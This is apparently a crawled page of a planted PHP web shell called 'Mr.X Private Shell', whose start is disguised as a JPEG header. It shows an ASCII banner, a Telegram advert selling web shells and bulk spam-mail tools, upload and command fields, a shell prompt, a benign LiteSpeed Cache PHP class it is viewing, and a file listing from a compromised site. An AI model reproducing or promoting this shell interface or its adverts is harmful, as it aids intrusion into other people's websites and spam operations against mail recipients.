����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.144: ~ $
<?php

/** ******************************************
 * LiteSpeed Web Server Cache Manager
 *
 * @author    Michael Alegre
 * @copyright 2026 LiteSpeed Technologies, Inc.
 * @since 1.17.10
 * ******************************************* */

namespace Lsc\Wp\Panel;

/**
 * Value object returned by ControlPanel::getPhpBinaryParts().
 *
 * Separates the PHP binary path (one shell token, will be escapeshellarg'd
 * by the consumer) from the options string (shell-active, library-built).
 *
 * @since 1.17.10
 */
class PhpBinaryParts
{

    /**
     * @since 1.17.10
     * @var string
     */
    private $binPath;

    /**
     * @since 1.17.10
     * @var string
     */
    private $optionsString;

    /**
     *
     * @since 1.17.10
     *
     * @param string $binPath        Filesystem path to PHP executable.
     * @param string $optionsString  PHP CLI flags as a shell-active string.
     *                               May be empty.
     */
    public function __construct( $binPath, $optionsString = '' )
    {
        $this->binPath       = (string)$binPath;
        $this->optionsString = (string)$optionsString;
    }

    /**
     *
     * @since 1.17.10
     *
     * @return string
     */
    public function getBinPath()
    {
        return $this->binPath;
    }

    /**
     *
     * @since 1.17.10
     *
     * @return string
     */
    public function getOptionsString()
    {
        return $this->optionsString;
    }

}

Filemanager

Name Type Size Permission Actions
CPanel.php File 26.45 KB 0664
ControlPanel.php File 33.79 KB 0664
CustomPanelBase.php File 1.09 KB 0664
CustomPanelExample.php File 5.24 KB 0664
DirectAdmin.php File 15.76 KB 0664
PhpBinaryParts.php File 1.42 KB 0664
Plesk.php File 13.01 KB 0664